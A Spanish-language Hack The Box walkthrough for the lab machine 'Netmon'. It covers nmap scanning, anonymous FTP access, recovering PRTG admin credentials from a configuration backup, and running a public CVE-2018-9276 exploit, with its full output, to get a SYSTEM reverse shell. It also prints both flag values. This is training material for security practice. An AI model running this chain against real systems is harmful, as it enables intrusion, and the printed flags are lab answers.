Netmon

Sobre esta maquina: HTB

Sistema Operativo: Windows

Skills Usados:

  • PRTG

  • Python

  • Ftp

Primer escaneo en nmap:

nmap -p- --open -sS -T4 -Pn -n 10.10.10.152 -oN First_Scann

PORT STATE SERVICE 21/tcp open ftp 80/tcp open http 135/tcp open msrpc 139/tcp open netbios-ssn 445/tcp open microsoft-ds 5985/tcp open wsman 47001/tcp open winrm 49664/tcp open unknown 49665/tcp open unknown 49666/tcp open unknown 49667/tcp open unknown 49668/tcp open unknown 49669/tcp open unknown

Escaneo de versiones y scripts:

nmap -p21,80,135,139,445,5985,47001 -n -T4 -sVC 10.10.10.152 -oN sVC_Scann Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-05-28 13:31 EDT Nmap scan report for 10.10.10.152 Host is up (0.14s latency).

PORT STATE SERVICE VERSION 21/tcp open ftp Microsoft ftpd | ftp-syst: |_ SYST: Windows_NT | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 02-03-19 12:18AM 1024 .rnd | 02-25-19 10:15PM

inetpub | 07-16-16 09:18AMPerfLogs | 02-25-19 10:56PMProgram Files | 02-03-19 12:28AMProgram Files (x86) | 02-03-19 08:08AMUsers |_11-10-23 10:20AMWindows

80/tcp open http Indy httpd 18.1.37.13946 (Paessler PRTG bandwidth monitor) |_http-server-header: PRTG/18.1.37.13946 |_http-trane-info: Problem with XML parsing of /evox/about | http-title: Welcome | PRTG Network Monitor (NETMON) |_Requested resource was /index.htm

135/tcp open msrpc Microsoft Windows RPC

139/tcp open netbios-ssn Microsoft Windows netbios-ssn

445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0

47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results: | smb2-security-mode: | 3:1:1: |_ Message signing enabled but not required | smb-security-mode: | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-time: | date: 2025-05-28T17:31:19 |_ start_date: 2025-05-28T17:20:20

Vemos lo que corre en el puerto 80:

Captura

Realizamos whatweb:

whatweb 10.10.10.152

http://10.10.10.152 [302 Found] Country[RESERVED][ZZ], HTTPServer[PRTG/18.1.37.13946], IP[10.10.10.152], PRTG-Network-Monitor[18.1.37.13946,PRTG], RedirectLocation[/index.htm], UncommonHeaders[x-content-type-options], X-XSS-Protection[1; mode=block]

Tenemos ftp con acceso anonimo permitido, lo probamos:

ftp 10.10.10.152 Connected to 10.10.10.152. 220 Microsoft FTP Service Name (10.10.10.152:guerrerove): anonymous 331 Anonymous access allowed, send identity (e-mail name) as password. Password: 230 User logged in. Remote system type is Windows_NT. ftp> ls 229 Entering Extended Passive Mode (|||49951|) 150 Opening ASCII mode data connection. 02-03-19 12:18AM 1024 .rnd 02-25-19 10:15PM

inetpub 07-16-16 09:18AMPerfLogs 02-25-19 10:56PMProgram Files 02-03-19 12:28AMProgram Files (x86) 02-03-19 08:08AMUsers 11-10-23 10:20AMWindows 226 Transfer complete. ftp> cd Users 250 CWD command successful. ftp> ls 229 Entering Extended Passive Mode (|||49952|) 150 Opening ASCII mode data connection. 02-25-19 11:44PMAdministrator 01-15-24 11:03AMPublic 226 Transfer complete. ftp> cd Public 250 CWD command successful. ftp> ls 229 Entering Extended Passive Mode (|||49953|) 150 Opening ASCII mode data connection. 01-15-24 11:03AMDesktop 02-03-19 08:05AMDocuments 07-16-16 09:18AMDownloads 07-16-16 09:18AMMusic 07-16-16 09:18AMPictures 07-16-16 09:18AMVideos 226 Transfer complete. ftp> cd DEsktop 250 CWD command successful. ftp> ls 229 Entering Extended Passive Mode (|||49956|) 125 Data connection already open; Transfer starting. 02-03-19 12:18AM 1195 PRTG Enterprise Console.lnk 02-03-19 12:18AM 1160 PRTG Network Monitor.lnk 05-28-25 01:21PM 34 user.txt 226 Transfer complete. ftp> get user.txt local: user.txt remote: user.txt 229 Entering Extended Passive Mode (|||49964|) 150 Opening ASCII mode data connection. 100% |***********************************************************************************| 34 0.24 KiB/s 00:00 ETA 226 Transfer complete. 34 bytes received in 00:00 (0.23 KiB/s)

Descargamos la flag a nuestra maquinay la leemos:

cat user.txt

File: user.txt

1 ā”‚ c4f605dc6538011375f21d0b372c67e3

Buscamos en donde almacena la data la web:

ftp> cd /ProgramData 250 CWD command successful. ftp> ls 229 Entering Extended Passive Mode (|||50491|) 150 Opening ASCII mode data connection. 12-15-21 10:40AM

Corefig 02-03-19 12:15AMLicenses 11-20-16 10:36PMMicrosoft 02-03-19 12:18AMPaessler 02-03-19 08:05AMregid.1991-06.com.microsoft 07-16-16 09:18AMSoftwareDistribution 02-03-19 12:15AMTEMP 11-20-16 10:19PMUSOPrivate 11-20-16 10:19PMUSOShared 02-25-19 10:56PMVMware 226 Transfer complete.

Descargamos el backup de la data y lo observamos en nuestra terminal:

(captura)

Tenemos usuario y password:

prtgadmin PrTg@dmin2018

Intentamos logearnos pero no nos deja, al ser un file backup cambiamos la password por un numero mas arriba PrTg@dmin2019:

Captura

y estamos dentro:

captura

Buscamos alguna vulnerabilidad para ganar shell como root:

https://github.com/A1vinSmith/CVE-2018-9276

Utilizaremos el exploit creado en este repositorio para obtener una reverse shell veamos un poco su uso:

git clone https://github.com/A1vinSmith/CVE-2018-9276.git

./exploit.py -i targetIP -p targetPort --lhost hostIP --lport hostPort --user user --password pass

Lo ejecutamos:

ls

ļ„• CVE-2018-9276 ļ‡€ 'PRTG Configuration.dat' ó°Æ 'PRTG Configuration.old.bak' ļ† prtg20250528.log

āÆ cd CVE-2018-9276

āÆ ls ī˜† exploit.py ī˜Š LICENSE ī˜‰ README.md

āÆ chmod +x exploit.py

āÆ ./exploit.py -i 10.10.10.152 -p 80 --lhost 10.10.14.11 --lport 443 --user prtgadmin --password PrTg@dmin2019 [+] [PRTG/18.1.37.13946] is Vulnerable!

[] Exploiting [10.10.10.152:80] as [prtgadmin/PrTg@dmin2019] [+] Session obtained for [prtgadmin:PrTg@dmin2019] [+] File staged at [C:\Users\Public\tester.txt] successfully with objid of [2018] [+] Session obtained for [prtgadmin:PrTg@dmin2019] [+] Notification with objid [2018] staged for execution [] Generate msfvenom payload with [LHOST=10.10.14.11 LPORT=443 OUTPUT=/tmp/eigaplox.dll] [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload No encoder specified, outputting raw payload Payload size: 324 bytes Final size of dll file: 9216 bytes /home/guerrerove/HTB/machines/netmon/exploit/CVE-2018-9276/./exploit.py:294: DeprecationWarning: setName() is deprecated, set the name attribute instead impacket.setName('Impacket') /home/guerrerove/HTB/machines/netmon/exploit/CVE-2018-9276/./exploit.py:295: DeprecationWarning: setDaemon() is deprecated, set the daemon attribute instead impacket.setDaemon(True) [] Config file parsed [] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0 [] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0 [] Config file parsed [] Hosting payload at [\10.10.14.11\XLNLETWF] [+] Session obtained for [prtgadmin:PrTg@dmin2019] [+] Command staged at [C:\Users\Public\tester.txt] successfully with objid of [2019] [+] Session obtained for [prtgadmin:PrTg@dmin2019] [+] Notification with objid [2019] staged for execution [] Attempting to kill the impacket thread [-] Impacket will maintain its own thread for active connections, so you may find it's still listening on :445! [-] ps aux | grep and kill -9 <pid> if it is still running :) [-] The connection will eventually time out.

[+] Listening on [10.10.14.11:443 for the reverse shell!] listening on [any] 443 ... [] Incoming connection (10.10.10.152,51114) [] AUTHENTICATE_MESSAGE (,NETMON) [] User NETMON\ authenticated successfully [] :::00::aaaaaaaaaaaaaaaa whconnect to [10.10.14.11] from (UNKNOWN) [10.10.10.152] 51115 Microsoft Windows [Version 10.0.14393] (c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami whoami nt authority\system

Y estamos dentro, buscamos la ultima flag:

C:\Windows\system32>cd C://

C:>dir

Directory of C:\

02/03/2019 12:18 AM 1,024 .rnd 02/25/2019 10:15 PM

inetpub 07/16/2016 09:18 AMPerfLogs 02/25/2019 10:56 PMProgram Files 02/03/2019 12:28 AMProgram Files (x86) 02/03/2019 08:08 AMUsers 11/10/2023 10:20 AMWindows 1 File(s) 1,024 bytes 6 Dir(s) 6,741,463,040 bytes free

C:>cd USers

C:\Users>dir

Directory of C:\Users

02/03/2019 08:08 AM 02/03/2019 08:08 AM.. 02/25/2019 11:44 PMAdministrator 05/28/2025 02:45 PMPublic 0 File(s) 0 bytes 4 Dir(s) 6,741,458,944 bytes free

C:\Users>cd Administrator

C:\Users\Administrator>dir

Directory of C:\Users\Administrator

02/25/2019 11:58 PM

02/25/2019 11:58 PM.. 02/03/2019 08:08 AMContacts 02/03/2019 12:35 AMDesktop 02/03/2019 08:08 AMDocuments 02/03/2019 08:08 AMDownloads 02/03/2019 08:08 AMFavorites 02/03/2019 08:08 AMLinks 02/03/2019 08:08 AMMusic 02/03/2019 08:08 AMPictures 02/03/2019 08:08 AMSaved Games 02/03/2019 08:08 AMSearches 02/25/2019 11:06 PMVideos 0 File(s) 0 bytes 13 Dir(s) 6,741,458,944 bytes free

C:\Users\Administrator>cd DEsktop

C:\Users\Administrator\Desktop>dir

02/03/2019 12:35 AM

02/03/2019 12:35 AM.. 05/28/2025 01:21 PM 34 root.txt 1 File(s) 34 bytes 2 Dir(s) 6,741,458,944 bytes free

C:\Users\Administrator\Desktop>type root.txt

7e69b2ac788996784114ccb4ab576a2e

Ya con la flag root damos por concluida esta maquina.

PreviousKeeperNextPlanning

Last updated